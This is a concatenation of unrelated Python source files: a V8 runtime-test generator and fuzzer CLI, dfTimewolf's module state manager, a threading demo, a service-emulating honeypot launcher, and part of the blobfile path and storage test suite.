os.remove(stderr_file_name)
def BuildOptionParser():
usage = """Usage: %%prog [options] ACTION
where ACTION can be:
info Print diagnostic info.
check Check that runtime functions can be parsed as expected, and that
test cases exist.
generate Parse source code for runtime functions, and auto-generate
test cases for them. Warning: this will nuke and re-create
%(path)s.
fuzz Generate fuzz tests, run them, save those that crashed (see options).
""" % {"path": os.path.relpath(BASEPATH)}
o = optparse.OptionParser(usage=usage)
o.add_option("--binary", default="out/x64.debug/d8",
help="d8 binary used for running fuzz tests (default: %default)")
o.add_option("--fuzz-target", default="runtime",
help="Set of functions targeted by fuzzing. Allowed values: "
"%s (default: %%default)" % ", ".join(FUZZ_TARGET_LISTS))
o.add_option("-n", "--num-tests", default=1000, type="int",
help="Number of fuzz tests to generate per worker process"
" (default: %default)")
o.add_option("--save-path", default="~/runtime_fuzz_output",
help="Path to directory where failing tests will be stored"
" (default: %default)")
o.add_option("--timeout", default=20, type="int",
help="Timeout for each fuzz test (in seconds, default:"
"%default)")
return o
def ProcessOptions(options, args):
options.save_path = os.path.expanduser(options.save_path)
if options.fuzz_target not in FUZZ_TARGET_LISTS:
print("Invalid fuzz target: %s" % options.fuzz_target)
return False
if len(args) != 1 or args[0] == "help":
return False
return True
def Main():
parser = BuildOptionParser()
(options, args) = parser.parse_args()
if not ProcessOptions(options, args):
parser.print_help()
return 1
action = args[0]
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
builtins = FindJSBuiltins()
if action == "test":
print("put your temporary debugging code here")
return 0
if action == "info":
print("%d functions total; js_fuzzable_functions: %d, "
"cctest_fuzzable_functions: %d, unknown_functions: %d"
% (len(functions), len(js_fuzzable_functions),
len(cctest_fuzzable_functions), len(unknown_functions)))
print("%d JavaScript builtins" % len(builtins))
print("unknown functions:")
for f in unknown_functions:
print(f)
return 0
if action == "check":
errors = 0
def CheckCount(actual, expected, description):
if len(actual) != expected:
print("Expected to detect %d %s, but found %d." % (
expected, description, len(actual)))
print("If this change is intentional, please update the expectations"
" at the top of %s." % THIS_SCRIPT)
return 1
return 0
errors += CheckCount(functions, EXPECTED_FUNCTION_COUNT,
"functions in total")
errors += CheckCount(js_fuzzable_functions, EXPECTED_FUZZABLE_COUNT,
"JavaScript-fuzzable functions")
errors += CheckCount(cctest_fuzzable_functions, EXPECTED_CCTEST_COUNT,
"cctest-fuzzable functions")
errors += CheckCount(unknown_functions, EXPECTED_UNKNOWN_COUNT,
"functions with incomplete type information")
errors += CheckCount(builtins, EXPECTED_BUILTINS_COUNT,
"JavaScript builtins")
def CheckTestcasesExisting(functions):
errors = 0
for f in functions:
if not os.path.isfile(os.path.join(BASEPATH, f.Filename())):
print("Missing testcase for %s, please run '%s generate'" %
(f.name, THIS_SCRIPT))
errors += 1
files = filter(lambda filename: not filename.startswith("."),
os.listdir(BASEPATH))
if (len(files) != len(functions)):
unexpected_files = set(files) - set([f.Filename() for f in functions])
for f in unexpected_files:
print("Unexpected testcase: %s" % os.path.join(BASEPATH, f))
errors += 1
print("Run '%s generate' to automatically clean these up."
% THIS_SCRIPT)
return errors
errors += CheckTestcasesExisting(js_fuzzable_functions)
def CheckNameClashes(runtime_functions, builtins):
errors = 0
runtime_map = {}
for f in runtime_functions:
runtime_map[f.name] = 1
for b in builtins:
if b.name in runtime_map:
print("Builtin/Runtime_Function name clash: %s" % b.name)
errors += 1
return errors
errors += CheckNameClashes(functions, builtins)
if errors > 0:
return 1
print("Generated runtime tests: all good.")
return 0
if action == "generate":
GenerateTestcases(js_fuzzable_functions)
return 0
if action == "fuzz":
processes = []
if not os.path.isdir(options.save_path):
os.makedirs(options.save_path)
stop_running = multiprocessing.Event()
for i in range(multiprocessing.cpu_count()):
args = (i, options, stop_running)
p = multiprocessing.Process(target=RunFuzzer, args=args)
p.start()
processes.append(p)
try:
for i in range(len(processes)):
processes[i].join()
except KeyboardInterrupt:
stop_running.set()
for i in range(len(processes)):
processes[i].join()
return 0
if __name__ == "__main__":
sys.exit(Main())
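# Typical invocations (a sketch; the d8 path and flag values are examples, see
# BuildOptionParser above for the authoritative defaults):
#   tools/generate-runtime-tests.py info
#   tools/generate-runtime-tests.py check
#   tools/generate-runtime-tests.py generate
#   tools/generate-runtime-tests.py fuzz --binary=out/x64.debug/d8 -n 500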
|
state.py
|
# -*- coding: utf-8 -*-
"""This class maintains the internal dfTimewolf state.
Use it to track errors, abort on global failures, clean up after modules, etc.
"""
from concurrent.futures import ThreadPoolExecutor
import importlib
import logging
import threading
import traceback
from typing import Callable, Dict, List, Sequence, TYPE_CHECKING, Type, Any, TypeVar, cast # pylint: disable=line-too-long
from dftimewolf.config import Config
from dftimewolf.lib import errors, utils
from dftimewolf.lib.errors import DFTimewolfError
from dftimewolf.lib.modules import manager as modules_manager
from dftimewolf.lib.module import ThreadAwareModule
if TYPE_CHECKING:
from dftimewolf.lib import module as dftw_module
from dftimewolf.lib.containers import interface
T = TypeVar("T", bound="interface.AttributeContainer") # pylint: disable=invalid-name,line-too-long
# TODO(tomchop): Consider changing this to `dftimewolf.state` if we ever need
# more granularity.
logger = logging.getLogger('dftimewolf')
NEW_ISSUE_URL = 'https://github.com/log2timeline/dftimewolf/issues/new'
class DFTimewolfState(object):
"""The main State class.
Attributes:
command_line_options (dict[str, str]): Command line options passed to
dftimewolf.
config (dftimewolf.config.Config): Class to be used throughout execution.
errors (list[tuple[str, bool]]): errors generated by a module. These
should be cleaned up after each module run using the CleanUp() method.
    global_errors (list[tuple[str, bool]]): the CleanUp() method moves
        non-critical errors to this attribute for later reporting.
input (list[str]): data that the current module will use as input.
output (list[str]): data that the current module generates.
recipe: (dict[str, str]): recipe declaring modules to load.
store (dict[str, object]): arbitrary data for modules.
"""
def __init__(self, config: Type[Config]) -> None:
"""Initializes a state."""
super(DFTimewolfState, self).__init__()
self.command_line_options = {} # type: Dict[str, str]
self._cache = {} # type: Dict[str, str]
self._module_pool = {} # type: Dict[str, dftw_module.BaseModule]
self._state_lock = threading.Lock()
self._threading_event_per_module = {} # type: Dict[str, threading.Event]
self.config = config
self.errors = [] # type: List[DFTimewolfError]
self.global_errors = [] # type: List[DFTimewolfError]
self.recipe = {} # type: Dict[str, Any]
self.store = {} # type: Dict[str, List[interface.AttributeContainer]]
self.streaming_callbacks = {} # type: Dict[Type[interface.AttributeContainer], List[Callable[[Any], Any]]] # pylint: disable=line-too-long
self._abort_execution = False
def _InvokeModulesInThreads(self, callback: Callable[[Any], Any]) -> None:
"""Invokes the callback function on all the modules in separate threads.
Args:
callback (function): callback function to invoke on all the modules.
"""
threads = []
for module_definition in self.recipe['modules']:
thread_args = (module_definition, )
thread = threading.Thread(target=callback, args=thread_args)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
self.CheckErrors(is_global=True)
def ImportRecipeModules(self, module_locations: Dict[str, str]) -> None:
"""Dynamically loads the modules declared in a recipe.
Args:
      module_locations (dict[str, str]): A dfTimewolf module name - Python module
mapping. e.g.:
{'GRRArtifactCollector': 'dftimewolf.lib.collectors.grr_hosts'}
Raises:
errors.RecipeParseError: if a module requested in a recipe does not
exist in the mapping.
"""
for module in self.recipe['modules'] + self.recipe.get('preflights', []):
name = module['name']
if name not in module_locations:
msg = (f'In {self.recipe["name"]}: module {name} cannot be found. '
'It may not have been declared.')
raise errors.RecipeParseError(msg)
logger.debug('Loading module {0:s} from {1:s}'.format(
name, module_locations[name]))
location = module_locations[name]
try:
importlib.import_module(location)
except ModuleNotFoundError as exception:
msg = f'Cannot find Python module for {name} ({location}): {exception}'
        raise errors.RecipeParseError(msg) from exception
def LoadRecipe(self,
recipe: Dict[str, Any],
module_locations: Dict[str, str]) -> None:
"""Populates the internal module pool with modules declared in a recipe.
Args:
      recipe (dict[str, Any]): recipe declaring modules to load.
      module_locations (dict[str, str]): mapping of dfTimewolf module names to
          the Python modules that define them.
Raises:
RecipeParseError: if a module in the recipe has not been declared.
"""
self.recipe = recipe
module_definitions = recipe.get('modules', [])
preflight_definitions = recipe.get('preflights', [])
self.ImportRecipeModules(module_locations)
for module_definition in module_definitions + preflight_definitions:
# Combine CLI args with args from the recipe description
module_name = module_definition['name']
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
runtime_name = module_definition.get('runtime_name')
if not runtime_name:
runtime_name = module_name
self._module_pool[runtime_name] = module_class(self, name=runtime_name)
def FormatExecutionPlan(self) -> str:
"""Formats execution plan.
    Returns a string describing the loaded modules and their corresponding
    arguments.
Returns:
str: String representation of loaded modules and their parameters.
"""
plan = ""
maxlen = 0
modules = self.recipe.get('preflights', []) + self.recipe.get('modules', [])
for module in modules:
if not module['args']:
continue
spacing = len(max(module['args'].keys(), key=len))
maxlen = maxlen if maxlen > spacing else spacing
for module in modules:
runtime_name = module.get('runtime_name')
if runtime_name:
plan += '{0:s} ({1:s}):\n'.format(runtime_name, module['name'])
else:
plan += '{0:s}:\n'.format(module['name'])
new_args = utils.ImportArgsFromDict(
module['args'], self.command_line_options, self.config)
if not new_args:
plan += ' *No params*\n'
for key, value in new_args.items():
plan += ' {0:s}{1:s}\n'.format(key.ljust(maxlen + 3), repr(value))
return plan
def LogExecutionPlan(self) -> None:
"""Logs the result of FormatExecutionPlan() using the base logger."""
for line in self.FormatExecutionPlan().split('\n'):
logger.debug(line)
def AddToCache(self, name: str, value: Any) -> None:
"""Thread-safe method to add data to the state's cache.
If the cached item is already in the cache it will be
overwritten with the new value.
Args:
name (str): string with the name of the cache variable.
value (object): the value that will be stored in the cache.
"""
with self._state_lock:
self._cache[name] = value
def GetFromCache(self, name: str, default_value: Any=None) -> Any:
"""Thread-safe method to get data from the state's cache.
Args:
name (str): string with the name of the cache variable.
default_value (object): the value that will be returned if
the item does not exist in the cache. Optional argument
and defaults to None.
Returns:
object: object from the cache that corresponds to the name, or
the value of "default_value" if the cache does not contain
the variable.
"""
with self._state_lock:
return self._cache.get(name, default_value)
def StoreContainer(self, container: "interface.AttributeContainer") -> None:
"""Thread-safe method to store data in the state's store.
Args:
container (AttributeContainer): data to store.
"""
with self._state_lock:
self.store.setdefault(container.CONTAINER_TYPE, []).append(container)
def GetContainers(self,
container_class: Type[T],
pop: bool=False) -> Sequence[T]:
"""Thread-safe method to retrieve data from the state's store.
Args:
container_class (type): AttributeContainer class used to filter data.
pop (Optional[bool]): Whether to remove the containers from the state when
they are retrieved.
Returns:
Collection[AttributeContainer]: attribute container objects provided in
the store that correspond to the container type.
"""
with self._state_lock:
container_objects = cast(
List[T], self.store.get(container_class.CONTAINER_TYPE, []))
if pop:
self.store[container_class.CONTAINER_TYPE] = []
return tuple(container_objects)
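  # Illustrative sketch (not upstream documentation): modules typically hand
  # data to each other through the store along these lines, where `MyContainer`
  # stands in for any interface.AttributeContainer subclass:
  #
  #   state.StoreContainer(MyContainer(...))          # producing module
  #   for c in state.GetContainers(MyContainer):      # consuming module
  #     ...
  #   state.GetContainers(MyContainer, pop=True)      # also clears the store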
def _SetupModuleThread(self, module_definition: Dict[str, str]) -> None:
"""Calls the module's SetUp() function and sets a threading event for it.
Callback for _InvokeModulesInThreads.
Args:
module_definition (dict[str, str]): recipe module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
logger.info('Setting up module: {0:s}'.format(runtime_name))
new_args = utils.ImportArgsFromDict(
module_definition['args'], self.command_line_options, self.config)
module = self._module_pool[runtime_name]
try:
if isinstance(module, ThreadAwareModule):
module.PreSetUp()
module.SetUp(**new_args)
if isinstance(module, ThreadAwareModule):
module.PostSetUp()
except errors.DFTimewolfError:
msg = "A critical error occurred in module {0:s}, aborting execution."
logger.critical(msg.format(module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
self._threading_event_per_module[runtime_name] = threading.Event()
self.CleanUp()
def SetupModules(self) -> None:
"""Performs setup tasks for each module in the module pool.
Threads declared modules' SetUp() functions. Takes CLI arguments into
account when replacing recipe parameters for each module.
"""
# Note that vars() copies the values of argparse.Namespace to a dict.
self._InvokeModulesInThreads(self._SetupModuleThread)
def _RunModuleThread(self, module_definition: Dict[str, str]) -> None:
"""Runs the module's Process() function.
Callback for _InvokeModulesInThreads.
Waits for any blockers to have finished before running Process(), then
sets an Event flag declaring the module has completed.
Args:
module_definition (dict): module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
for dependency in module_definition['wants']:
self._threading_event_per_module[dependency].wait()
module = self._module_pool[runtime_name]
# Abort processing if a module has had critical failures before.
if self._abort_execution:
logger.critical(
'Aborting execution of {0:s} due to previous errors'.format(
module.name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
return
logger.info('Running module: {0:s}'.format(runtime_name))
try:
if isinstance(module, ThreadAwareModule):
module.PreProcess()
futures = []
logger.info(
'Running {0:d} threads, max {1:d} simultaneous for module {2:s}'\
.format(
len(self.GetContainers(module.GetThreadOnContainerType())),
module.GetThreadPoolSize(),
runtime_name))
with ThreadPoolExecutor(max_workers=module.GetThreadPoolSize()) \
as executor:
for container in \
self.GetContainers(module.GetThreadOnContainerType()):
futures.append(
executor.submit(module.Process, container))
module.PostProcess()
for fut in futures:
if fut.exception():
raise fut.exception() # type: ignore
if not module.KeepThreadedContainersInState():
self.GetContainers(module.GetThreadOnContainerType(), True)
else:
module.Process()
except errors.DFTimewolfError:
logger.critical(
"Critical error in module {0:s}, aborting execution".format(
module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
logger.info('Module {0:s} finished execution'.format(runtime_name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
def RunPreflights(self) -> None:
"""Runs preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
args = preflight_definition.get('args', {})
new_args = utils.ImportArgsFromDict(
args, self.command_line_options, self.config)
preflight = self._module_pool[runtime_name]
try:
preflight.SetUp(**new_args)
preflight.Process()
finally:
self.CheckErrors(is_global=True)
def CleanUpPreflights(self) -> None:
"""Executes any cleanup actions defined in preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
preflight = self._module_pool[runtime_name]
try:
preflight.CleanUp()
finally:
self.CheckErrors(is_global=True)
def InstantiateModule(self, module_name: str) -> "dftw_module.BaseModule":
"""Instantiates an arbitrary dfTimewolf module.
Args:
module_name (str): The name of the module to instantiate.
Returns:
BaseModule: An instance of a dftimewolf Module, which is a subclass of
BaseModule.
"""
module_class: Type["dftw_module.BaseModule"]
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
return module_class(self)
def RunModules(self) -> None:
"""Performs the actual processing for each module in the module pool."""
self._InvokeModulesInThreads(self._RunModuleThread)
def RegisterStreamingCallback(
self,
target: Callable[["interface.AttributeContainer"], Any],
container_type: Type["interface.AttributeContainer"]) -> None:
"""Registers a callback for a type of container.
    The function to be registered should accept a single parameter of type
interface.AttributeContainer.
Args:
target (function): function to be called.
container_type (type[interface.AttributeContainer]): container type on
which the callback will be called.
"""
if container_type not in self.streaming_callbacks:
self.streaming_callbacks[container_type] = []
self.streaming_callbacks[container_type].append(target)
def StreamContainer(self, container: "interface.AttributeContainer") -> None:
"""Streams a container to the callbacks that are registered to handle it.
Args:
container (interface.AttributeContainer): container instance that will be
streamed to any registered callbacks.
"""
for callback in self.streaming_callbacks.get(type(container), []):
callback(container)
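  # Minimal sketch of the streaming flow, with `MyContainer` and
  # `HandleContainer` as illustrative placeholders for a container class and a
  # module-defined callable:
  #
  #   state.RegisterStreamingCallback(HandleContainer, MyContainer)
  #   state.StreamContainer(MyContainer(...))  # calls HandleContainer(container)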
def AddError(self, error: DFTimewolfError) -> None:
"""Adds an error to the state.
Args:
error (errors.DFTimewolfError): The dfTimewolf error to add.
"""
if error.critical:
self._abort_execution = True
self.errors.append(error)
def CleanUp(self) -> None:
"""Cleans up after running a module.
The state's output becomes the input for the next stage. Any errors are
moved to the global_errors attribute so that they can be reported at a
later stage.
"""
# Move any existing errors to global errors
self.global_errors.extend(self.errors)
self.errors = []
def CheckErrors(self, is_global: bool=False) -> None:
"""Checks for errors and exits if any of them are critical.
Args:
is_global (Optional[bool]): True if the global_errors attribute should
        be checked. False if the errors attribute should be checked.
"""
error_objects = self.global_errors if is_global else self.errors
critical_errors = False
if error_objects:
logger.error('dfTimewolf encountered one or more errors:')
for index, error in enumerate(error_objects):
logger.error('{0:d}: error from {1:s}: {2:s}'.format(
index+1, error.name, error.message))
if error.stacktrace:
for line in error.stacktrace.split('\n'):
logger.error(line)
if error.critical:
critical_errors = True
if any(error.unexpected for error in error_objects):
logger.critical('One or more unexpected errors occurred.')
logger.critical(
'Please consider opening an issue: {0:s}'.format(NEW_ISSUE_URL))
if critical_errors:
raise errors.CriticalError('Critical error found. Aborting.')
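# Rough lifecycle sketch (an assumption: the real sequencing lives in
# dftimewolf's CLI entry point; `recipe_dict` and `locations` are placeholders
# for data normally supplied by the recipe and modules managers):
#
#   state = DFTimewolfState(Config)
#   state.LoadRecipe(recipe_dict, locations)
#   state.RunPreflights()
#   state.SetupModules()
#   state.RunModules()
#   state.CheckErrors(is_global=True)
#   state.CleanUpPreflights()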
|
mtsleepF.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2019/8/10 4:09 PM
from atexit import register
from random import randrange
from threading import Thread, Lock, current_thread
from time import sleep, ctime

class CleanOutputSet(set):
    def __str__(self):
        return ', '.join(x for x in self)

lock = Lock()
loops = (randrange(2, 5) for _ in range(randrange(3, 7)))
remaining = CleanOutputSet()

def loop(nsec):
    myname = current_thread().name
    with lock:
        remaining.add(myname)
        print('[%s] Started %s' % (ctime(), myname))
    sleep(nsec)
    with lock:
        remaining.remove(myname)
        print('[%s] Completed %s (%d secs)' % (ctime(), myname, nsec))
        print('    (remaining: %s)' % (remaining or 'NONE'))

def main():
    for pause in loops:
        Thread(target=loop, args=(pause,)).start()

@register
def _atexit():
    print('all DONE at:', ctime())

if __name__ == '__main__':
    main()
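# Note: the @register'd _atexit handler only runs when the interpreter exits,
# which happens after every non-daemon worker thread has finished, so the
# "all DONE" line is printed after the last loop() call completes.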
|
app.py
|
from Tunnel.packetBackUp import startIntercept
from Tunnel.VirtualDevice import addNewDevice
import configparser
from xeger import Xeger
import logging.handlers
import os
from vfssh.CyderSSHServer import start_ssh_server
from connection.server_telnet import start_telnet_server
from connection.server_http import start_http_server
from multiprocessing import Process
import gconstant as gc
def main():
# Configparser to read configurations
config = configparser.ConfigParser(interpolation=None)
config.read(os.path.dirname(os.path.realpath(__file__)) + '/configuration/host_config.ini')
print("Starting Program...")
debug = logging.getLogger('cyder-debug')
if config.getboolean('CONFIGURATION', 'debug', fallback=False):
debug.debug('#'*50)
debug.debug('Starting Program...')
# Get Host Machine IP & MAC Address
ip, mac_addr = config.get('HOST', 'ip', fallback=None), config.get('HOST', 'mac_address', fallback=None)
if ip is None:
return
# Services (Specified in Configuration File)
services = dict()
for key in config['HOST']:
try:
services[int(key)] = process(config['HOST'][key])
except ValueError:
pass
# SSH Server (AsyncSSH)
if config.getboolean('HOST', 'ssh', fallback=False):
print('SSH Enabled')
start_service(services[22].strip(), 22, '0.0.0.0', start_ssh_server)
del services[22]
# Telnet Server (Twisted)
if config.getboolean('HOST', 'telnet', fallback=False):
print('Telnet Enabled')
start_service(services[23], 23, '0.0.0.0', start_telnet_server)
del services[23]
# HTTP Server (Waitress)
if config.getboolean('HOST', 'http', fallback=False):
print('HTTP Enabled')
start_service(services[80].strip(), 80, '0.0.0.0', start_http_server)
del services[80]
# Port 2323
start_service(services[2323], 2323, '0.0.0.0', start_telnet_server)
del services[2323]
# Add Device To Subnet
addNewDevice(name='HOST', services=services, fingerprint=config.get('HOST', 'fingerprint'),
ip=ip, mac_addr=mac_addr)
# addNewDevice(name='Test', services=service, fingerprint=host['fingerprint'], ip='192.168.1.1', macAddr=mac_addr)
print('Done Loading...')
debug.debug('Done Loading...')
startIntercept()
def start_service(banner, port, host, target):
    # Run the SSH / Telnet / HTTP service in a separate child process.
mp = Process(target=target, args=(host, port, banner,))
mp.daemon = True
mp.start()
def process(data, limit=10, increment=100):
    # Generate a concrete string from the regex in 'data'; retry with a larger
    # limit when Xeger raises ValueError (an increment of 150 takes ~7.9 seconds).
try:
x = Xeger(limit)
val = x.xeger(data)
except ValueError:
val = process(data, limit+increment, increment)
return val
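# Illustrative example of what process() produces (the pattern below is made
# up, not taken from the real host_config.ini): Xeger expands a banner regex
# into a concrete string, with `limit` capping how far unbounded quantifiers
# may expand.
#
#   process(r"SSH-2\.0-OpenSSH_7\.[0-9]")  # -> e.g. "SSH-2.0-OpenSSH_7.4"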
if __name__ == "__main__":
main()
|
_ops_test.py
|
# https://github.com/tensorflow/tensorflow/issues/27023
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
warnings.filterwarnings("ignore", category=FutureWarning)
import random
import string
import tempfile
import os
import contextlib
import json
import urllib.request
import hashlib
import time
import subprocess as sp
import multiprocessing as mp
import platform
import pickle
import zipfile
import av
import pytest
from tensorflow.io import gfile
import imageio
import numpy as np
import blobfile as bf
from blobfile import _ops as ops, _azure as azure, _common as common
GCS_TEST_BUCKET = os.getenv("GCS_TEST_BUCKET", "csh-test-3")
AS_TEST_ACCOUNT = os.getenv("AS_TEST_ACCOUNT", "cshteststorage2")
AS_TEST_ACCOUNT2 = os.getenv("AS_TEST_ACCOUNT2", "cshteststorage3")
AS_TEST_CONTAINER = os.getenv("AS_TEST_CONTAINER", "testcontainer2")
AS_TEST_CONTAINER2 = os.getenv("AS_TEST_CONTAINER2", "testcontainer3")
AS_INVALID_ACCOUNT = f"{AS_TEST_ACCOUNT}-does-not-exist"
AS_EXTERNAL_ACCOUNT = "cshteststorage4"
AZURE_VALID_CONTAINER = (
f"https://{AS_TEST_ACCOUNT}.blob.core.windows.net/{AS_TEST_CONTAINER}"
)
AZURE_INVALID_CONTAINER = f"https://{AS_TEST_ACCOUNT}.blob.core.windows.net/{AS_TEST_CONTAINER}-does-not-exist"
AZURE_INVALID_CONTAINER_NO_ACCOUNT = (
f"https://{AS_INVALID_ACCOUNT}.blob.core.windows.net/{AS_TEST_CONTAINER}"
)
GCS_VALID_BUCKET = f"gs://{GCS_TEST_BUCKET}"
GCS_INVALID_BUCKET = f"gs://{GCS_TEST_BUCKET}-does-not-exist"
AZURE_PUBLIC_URL = (
f"https://{AS_EXTERNAL_ACCOUNT}.blob.core.windows.net/publiccontainer/test_cat.png"
)
AZURE_PUBLIC_URL_HEADER = b"\x89PNG"
@pytest.fixture(scope="session", autouse=True)
def setup_gcloud_auth():
# only run this for our docker tests, this tells gcloud to use the credentials supplied by the
# test running script
if platform.system() == "Linux":
sp.run(
[
"gcloud",
"auth",
"activate-service-account",
f"--key-file={os.environ['GOOGLE_APPLICATION_CREDENTIALS']}",
]
)
yield
@contextlib.contextmanager
def chdir(path):
original_path = os.getcwd()
os.chdir(path)
yield
os.chdir(original_path)
@contextlib.contextmanager
def _get_temp_local_path():
with tempfile.TemporaryDirectory() as tmpdir:
assert isinstance(tmpdir, str)
path = os.path.join(tmpdir, "file.name")
yield path
@contextlib.contextmanager
def _get_temp_gcs_path():
path = f"gs://{GCS_TEST_BUCKET}/" + "".join(
random.choice(string.ascii_lowercase) for i in range(16)
)
gfile.mkdir(path)
yield path + "/file.name"
gfile.rmtree(path)
@contextlib.contextmanager
def _get_temp_as_path(account=AS_TEST_ACCOUNT, container=AS_TEST_CONTAINER):
random_id = "".join(random.choice(string.ascii_lowercase) for i in range(16))
path = f"https://{account}.blob.core.windows.net/{container}/" + random_id
yield path + "/file.name"
sp.run(
[
"az",
"storage",
"blob",
"delete-batch",
"--account-name",
account,
"--source",
container,
"--pattern",
f"{random_id}/*",
],
check=True,
shell=platform.system() == "Windows",
)
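# The three _get_temp_*_path helpers above follow the same pattern: yield a
# path under a randomly named prefix and clean it up afterwards. Most tests
# below parametrize over them so the same assertions run against local disk,
# GCS and Azure, e.g.:
#
#   @pytest.mark.parametrize(
#       "ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
#   )
#   def test_something(ctx):  # illustrative name
#       with ctx() as path:
#           ...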
def _write_contents(path, contents):
if ".blob.core.windows.net" in path:
with tempfile.TemporaryDirectory() as tmpdir:
assert isinstance(tmpdir, str)
account, container, blob = azure.split_path(path)
filepath = os.path.join(tmpdir, "tmp")
with open(filepath, "wb") as f:
f.write(contents)
sp.run(
[
"az",
"storage",
"blob",
"upload",
"--account-name",
account,
"--container-name",
container,
"--name",
blob,
"--file",
filepath,
],
check=True,
shell=platform.system() == "Windows",
stdout=sp.DEVNULL,
stderr=sp.DEVNULL,
)
else:
with gfile.GFile(path, "wb") as f:
f.write(contents)
def _read_contents(path):
if ".blob.core.windows.net" in path:
with tempfile.TemporaryDirectory() as tmpdir:
assert isinstance(tmpdir, str)
account, container, blob = azure.split_path(path)
filepath = os.path.join(tmpdir, "tmp")
sp.run(
[
"az",
"storage",
"blob",
"download",
"--account-name",
account,
"--container-name",
container,
"--name",
blob,
"--file",
filepath,
],
check=True,
shell=platform.system() == "Windows",
stdout=sp.DEVNULL,
stderr=sp.DEVNULL,
)
with open(filepath, "rb") as f:
return f.read()
else:
with gfile.GFile(path, "rb") as f:
return f.read()
def test_basename():
testcases = [
("/", ""),
("a/", ""),
("a", "a"),
("a/b", "b"),
("", ""),
("gs://a", ""),
("gs://a/", ""),
("gs://a/b/", ""),
("gs://a/b", "b"),
("gs://a/b/c/test.filename", "test.filename"),
("https://a.blob.core.windows.net/b", ""),
("https://a.blob.core.windows.net/b/", ""),
("https://a.blob.core.windows.net/b/c/", ""),
("https://a.blob.core.windows.net/b/c", "c"),
("https://a.blob.core.windows.net/b/c/test.filename", "test.filename"),
]
for input_, desired_output in testcases:
actual_output = bf.basename(input_)
assert desired_output == actual_output
def test_dirname():
testcases = [
("a", ""),
("a/b", "a"),
("a/b/c", "a/b"),
("a/b/c/", "a/b/c"),
("a/b/c/////", "a/b/c"),
("", ""),
("gs://a", "gs://a"),
("gs://a/", "gs://a"),
("gs://a/////", "gs://a"),
("gs://a/b", "gs://a"),
("gs://a/b/c/test.filename", "gs://a/b/c"),
("gs://a/b/c/", "gs://a/b"),
("gs://a/b/c/////", "gs://a/b"),
(
"https://a.blob.core.windows.net/container",
"https://a.blob.core.windows.net/container",
),
(
"https://a.blob.core.windows.net/container/",
"https://a.blob.core.windows.net/container",
),
(
"https://a.blob.core.windows.net/container/////",
"https://a.blob.core.windows.net/container",
),
(
"https://a.blob.core.windows.net/container/b",
"https://a.blob.core.windows.net/container",
),
(
"https://a.blob.core.windows.net/container/b/c/test.filename",
"https://a.blob.core.windows.net/container/b/c",
),
(
"https://a.blob.core.windows.net/container/b/c/",
"https://a.blob.core.windows.net/container/b",
),
(
"https://a.blob.core.windows.net/container/b/c//////",
"https://a.blob.core.windows.net/container/b",
),
]
for input_, desired_output in testcases:
actual_output = bf.dirname(input_)
assert desired_output == actual_output, f"{input_}"
def test_join():
testcases = [
("a", "b", "a/b"),
("a/b", "c", "a/b/c"),
("a/b/", "c", "a/b/c"),
("a/b/", "c/", "a/b/c/"),
("a/b/", "/c/", "/c/"),
("", "", ""),
# this doesn't work with : in the second path
(
"gs://a/b/c",
"d0123456789-._~!$&'()*+,;=@",
"gs://a/b/c/d0123456789-._~!$&'()*+,;=@",
),
("gs://a", "b", "gs://a/b"),
("gs://a/b", "c", "gs://a/b/c"),
("gs://a/b/", "c", "gs://a/b/c"),
("gs://a/b/", "c/", "gs://a/b/c/"),
("gs://a/b/", "/c/", "gs://a/c/"),
("gs://a/b/", "../c", "gs://a/c"),
("gs://a/b/", "../c/", "gs://a/c/"),
("gs://a/b/", "../../c/", "gs://a/c/"),
(
"https://a.blob.core.windows.net/container",
"b",
"https://a.blob.core.windows.net/container/b",
),
(
"https://a.blob.core.windows.net/container/b",
"c",
"https://a.blob.core.windows.net/container/b/c",
),
(
"https://a.blob.core.windows.net/container/b/",
"c",
"https://a.blob.core.windows.net/container/b/c",
),
(
"https://a.blob.core.windows.net/container/b/",
"c/",
"https://a.blob.core.windows.net/container/b/c/",
),
(
"https://a.blob.core.windows.net/container/b/",
"/c/",
"https://a.blob.core.windows.net/container/c/",
),
(
"https://a.blob.core.windows.net/container/b/",
"../c",
"https://a.blob.core.windows.net/container/c",
),
(
"https://a.blob.core.windows.net/container/b/",
"../c/",
"https://a.blob.core.windows.net/container/c/",
),
(
"https://a.blob.core.windows.net/container/b/",
"../../c/",
"https://a.blob.core.windows.net/container/c/",
),
("gs://test/a/b", "c:d", "gs://test/a/b/c:d"),
]
for input_a, input_b, desired_output in testcases:
actual_output = bf.join(input_a, input_b)
assert desired_output == actual_output, f"{input_a} {input_b}"
# also make sure az:// urls work
if "blob.core.windows.net" in input_a:
az_input_a = _convert_https_to_az(input_a)
actual_output = bf.join(az_input_a, input_b)
assert desired_output == actual_output, f"{az_input_a} {input_b}"
def _convert_https_to_az(path):
return path.replace("https://", "az://").replace(".blob.core.windows.net", "")
@pytest.mark.parametrize(
